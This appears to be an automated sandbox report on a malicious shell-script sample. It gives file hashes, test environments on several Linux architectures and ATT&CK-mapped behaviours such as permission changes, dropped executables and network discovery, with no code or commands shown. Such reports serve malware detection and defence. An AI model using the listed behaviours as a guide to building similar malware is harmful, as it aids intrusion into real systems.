Analysis
-
max time kernel
87s -
max time network
92s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240418-en -
resource tags
arch:mips image:debian9-mipsbe-20240418-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97